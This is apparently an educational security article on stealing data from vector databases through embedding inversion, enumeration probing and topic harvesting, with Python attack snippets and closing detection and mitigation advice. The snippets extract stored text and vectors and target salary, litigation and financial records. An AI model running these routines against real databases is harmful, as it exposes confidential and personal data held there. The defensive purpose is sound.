Data Exfiltration via Vector Databases
Data exfiltration techniques for vector databases: embedding inversion to reconstruct documents, enumeration attacks, and similarity-based data harvesting.
Data exfiltration from vector databases is a concern that many organizations underestimate. The common assumption is that embeddings are opaque numerical representations from which original content cannot be recovered. Research has shown this assumption is incorrect: embeddings can be inverted to recover meaningful text, and vector databases can be systematically queried to extract stored content at scale.
Embedding Inversion
Embedding inversion is the process of reconstructing the original input text from its embedding vector. While perfect reconstruction is generally not possible, partial reconstruction often recovers enough information to be useful to an attacker.
How Inversion Works
Embedding models are trained to map text to vectors such that similar texts produce similar vectors. Inversion models are trained on the reverse mapping: given a vector, predict the text that produced it.
# Conceptual inversion attack
# Step 1: Train an inversion model on known text-embedding pairs
inversion_model = train_inversion_model(
texts=known_texts,
embeddings=[embedding_model.encode(t) for t in known_texts]
)
# Step 2: Apply the inversion model to target embeddings
target_embedding = stolen_from_vector_db # Obtained via query or direct access
recovered_text = inversion_model.decode(target_embedding)Inversion Quality
The quality of inversion depends on several factors:
- Embedding dimensionality — Higher-dimensional embeddings (1536 for OpenAI, 768 for many open-source models) retain more information and are more susceptible to inversion
- Domain specificity — Embeddings of domain-specific text (medical records, legal documents) can be inverted more accurately when the inversion model is trained on similar domain data
- Model availability — If the attacker has access to the same embedding model, they can generate training pairs for the inversion model at will
- Text length — Shorter texts are more completely recoverable than longer texts, because the embedding captures a larger proportion of the information
Research has demonstrated recovery rates that vary from partial (key phrases and entities) to near-complete (full sentence reconstruction) depending on these factors.
Practical Inversion
An attacker with query access to a vector database can perform inversion in several ways:
# Method 1: Direct vector access
# If the API returns vector values along with results
results = index.query(vector=probe, top_k=100, include_values=True)
for match in results.matches:
recovered = inversion_model.decode(match.values)
print(f"ID: {match.id}, Recovered: {recovered}")
# Method 2: Metadata-assisted inversion
# Metadata often contains the original text or a summary
results = index.query(vector=probe, top_k=100, include_metadata=True)
for match in results.matches:
# Many RAG systems store the original chunk text in metadata
if "text" in match.metadata:
print(f"Original text: {match.metadata['text']}")Enumeration Attacks
Enumeration attacks systematically extract all or most vectors from a database by making a sequence of queries designed to cover the embedding space.
Exhaustive Query Enumeration
The simplest enumeration approach queries the database with diverse probe vectors to retrieve as many unique results as possible:
# Generate diverse probe vectors to cover the embedding space
retrieved_ids = set()
all_results = []
# Random probing
for i in range(10000):
probe = np.random.randn(1536)
probe = probe / np.linalg.norm(probe)
results = index.query(vector=probe.tolist(), top_k=100)
for match in results.matches:
if match.id not in retrieved_ids:
retrieved_ids.add(match.id)
all_results.append(match)
print(f"Retrieved {len(retrieved_ids)} unique vectors")Iterative Exclusion Enumeration
A more efficient approach uses query results to guide subsequent queries away from already-retrieved vectors:
# Start with a random probe
retrieved = []
for iteration in range(1000):
if not retrieved:
probe = np.random.randn(1536).tolist()
else:
# Generate a probe that is far from already-retrieved vectors
# by moving in the direction opposite to the centroid of retrieved vectors
centroid = np.mean([r['vector'] for r in retrieved], axis=0)
probe = -centroid + np.random.randn(1536) * 0.1
probe = (probe / np.linalg.norm(probe)).tolist()
results = index.query(vector=probe, top_k=100, include_values=True)
for match in results.matches:
if match.id not in {r['id'] for r in retrieved}:
retrieved.append({
'id': match.id,
'vector': match.values,
'metadata': match.metadata
})Index Statistics for Scope Assessment
Before enumerating, the attacker can assess the scope of the database:
stats = index.describe_index_stats()
total_vectors = stats.total_vector_count
namespaces = stats.namespaces
print(f"Total vectors: {total_vectors}")
print(f"Namespaces: {list(namespaces.keys())}")Similarity-Based Data Harvesting
Similarity-based harvesting uses domain knowledge to extract semantically related content, focusing on high-value data rather than exhaustive enumeration.
Targeted Topic Extraction
An attacker interested in specific topics generates queries designed to retrieve related content:
# Extract all content related to a specific topic
seed_queries = [
"quarterly revenue and financial projections",
"executive compensation and stock options",
"merger and acquisition targets",
"pending litigation and legal risks",
"customer data breach incidents"
]
harvested = {}
for query_text in seed_queries:
query_embedding = embedding_model.encode(query_text)
results = index.query(
vector=query_embedding.tolist(),
top_k=50,
include_metadata=True
)
harvested[query_text] = [m.metadata.get('text', '') for m in results.matches]Snowball Harvesting
Starting from initial results, use retrieved content to generate more targeted queries:
# Snowball: use retrieved content to find more related content
initial_query = "employee salary information"
queue = [initial_query]
all_harvested = set()
while queue:
query_text = queue.pop(0)
query_embedding = embedding_model.encode(query_text)
results = index.query(vector=query_embedding.tolist(), top_k=20)
for match in results.matches:
if match.id not in all_harvested:
all_harvested.add(match.id)
text = match.metadata.get('text', '')
# Extract key phrases from retrieved text to use as new queries
new_queries = extract_key_phrases(text)
queue.extend(new_queries[:3]) # Limit branchingCross-Namespace Harvesting
If the attacker discovers that data from multiple contexts is stored in different namespaces, they can harvest across namespaces:
# Harvest the same topic across all namespaces
for namespace in discovered_namespaces:
results = index.query(
vector=query_embedding.tolist(),
top_k=50,
namespace=namespace,
include_metadata=True
)
print(f"Namespace {namespace}: {len(results.matches)} results")Detection and Mitigation
Vector database exfiltration can be detected through:
- Query volume monitoring — Enumeration attacks require many queries; alert on unusual query rates
- Query diversity analysis — Random probing produces atypical query patterns compared to legitimate application queries
- Result coverage tracking — Monitor what percentage of stored vectors have been returned in query results
- Rate limiting — Limit queries per API key per time window
Mitigation approaches:
- Do not store original text in metadata — Store only a document ID and retrieve the text from a separate, access-controlled system
- Do not return vector values — Configure the API to return only IDs and scores, not the embedding vectors themselves
- Implement query auditing — Log all queries with sufficient detail to reconstruct an attacker's data access pattern
- Separate access tiers — Use different API keys with different permissions for different consumers
Related Topics
- Inversion Attacks — Technical details of embedding inversion
- Access Control — Access control gaps that enable exfiltration
- Membership Inference — Determining if specific data exists in the database